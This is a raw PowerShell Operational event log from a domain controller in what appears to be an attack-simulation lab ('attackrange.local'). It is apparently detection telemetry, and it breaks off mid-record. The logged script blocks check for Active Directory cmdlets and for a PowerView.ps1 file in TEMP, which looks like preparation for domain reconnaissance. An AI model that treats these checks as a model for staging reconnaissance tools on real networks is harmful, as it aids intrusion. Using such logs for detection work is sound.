Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478061
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478060
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478059
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478058
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478057
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478303
Keywords=None
Message=Completed invocation of ScriptBlock ID: 05adceb7-2bfe-45a6-97b6-d5d24d7c919a
Runspace ID: 6d4e8167-00e7-4c12-b02b-7bfd394b2dd1
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478302
Keywords=None
Message=Started invocation of ScriptBlock ID: 05adceb7-2bfe-45a6-97b6-d5d24d7c919a
Runspace ID: 6d4e8167-00e7-4c12-b02b-7bfd394b2dd1
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478301
Keywords=None
Message=Started invocation of ScriptBlock ID: dd2a47ed-e90f-4a16-b784-ca6492825d96
Runspace ID: 6d4e8167-00e7-4c12-b02b-7bfd394b2dd1
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478300
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }}

ScriptBlock ID: dd2a47ed-e90f-4a16-b784-ca6492825d96
Path:
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478299
Keywords=None
Message=Started invocation of ScriptBlock ID: 1874a77a-91d5-41ae-b7a0-7444da113eed
Runspace ID: 6d4e8167-00e7-4c12-b02b-7bfd394b2dd1
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478298
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }}

ScriptBlock ID: 1874a77a-91d5-41ae-b7a0-7444da113eed
Path:
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478297
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478296
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 696 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478295
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478294
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478293
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478292
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478291
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478290
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478289
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478288
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478287
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478286
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478285
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478284
Keywords=None
Message=Started invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478283
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478282
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2a657057-bf2a-430b-a391-e846fbfbb300
Runspace ID: 06b3f685-143f-44a0-a8be-d2825897c855
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478281
Keywords=None
Message=Completed invocation of ScriptBlock ID: ab5d4a02-39cc-45cc-9ebb-713a75c6ce40
Runspace ID: 06b3f685-143f-44a0-a8be-d2825897c855
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478280
Keywords=None
Message=Completed invocation of ScriptBlock ID: 76f1a405-4a7e-4d00-a250-147eb50142b8
Runspace ID: 06b3f685-143f-44a0-a8be-d2825897c855
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478279
Keywords=None
Message=Started invocation of ScriptBlock ID: 76f1a405-4a7e-4d00-a250-147eb50142b8
Runspace ID: 06b3f685-143f-44a0-a8be-d2825897c855
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478278
Keywords=None
Message=Started invocation of ScriptBlock ID: ab5d4a02-39cc-45cc-9ebb-713a75c6ce40
Runspace ID: 06b3f685-143f-44a0-a8be-d2825897c855
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478277
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}}

ScriptBlock ID: ab5d4a02-39cc-45cc-9ebb-713a75c6ce40
Path:
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478276
Keywords=None
Message=Started invocation of ScriptBlock ID: 2a657057-bf2a-430b-a391-e846fbfbb300
Runspace ID: 06b3f685-143f-44a0-a8be-d2825897c855
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478275
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}}

ScriptBlock ID: 2a657057-bf2a-430b-a391-e846fbfbb300
Path:
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478274
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478273
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 7456 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478272
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478271
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478270
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478269
Keywords=None
Message=Completed invocation of ScriptBlock ID: b3f73628-e8c6-4da5-b9bc-0263ca39192a
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478268
Keywords=None
Message=Started invocation of ScriptBlock ID: b3f73628-e8c6-4da5-b9bc-0263ca39192a
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478267
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: b3f73628-e8c6-4da5-b9bc-0263ca39192a
Path:
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478266
Keywords=None
Message=Completed invocation of ScriptBlock ID: 0f7877f5-b9ae-4ce1-b67c-0f2c38fbc268
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478265
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2f799c52-8d1c-4eda-ac6c-50cf709fd844
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478264
Keywords=None
Message=Completed invocation of ScriptBlock ID: becad337-3722-4436-9010-d0181cf2afcd
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478263
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3c8e7240-4606-44cf-aa1d-52c572b44c89
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478262
Keywords=None
Message=Started invocation of ScriptBlock ID: 3c8e7240-4606-44cf-aa1d-52c572b44c89
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478261
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 3c8e7240-4606-44cf-aa1d-52c572b44c89
Path:
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478260
Keywords=None
Message=Completed invocation of ScriptBlock ID: a802ff4b-de3c-4686-be9f-01fa5d91b83d
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478259
Keywords=None
Message=Started invocation of ScriptBlock ID: a802ff4b-de3c-4686-be9f-01fa5d91b83d
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478258
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: a802ff4b-de3c-4686-be9f-01fa5d91b83d
Path:
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478257
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6300a935-393c-479f-9cf0-a0095a8370ac
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478256
Keywords=None
Message=Completed invocation of ScriptBlock ID: 0c071910-2763-43bf-9f6c-a573d277710a
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478255
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6e0bf2cf-03bf-4e0d-889a-d1518cc0f912
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478254
Keywords=None
Message=Started invocation of ScriptBlock ID: 6e0bf2cf-03bf-4e0d-889a-d1518cc0f912
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478253
Keywords=None
Message=Creating Scriptblock text (1 of 1):
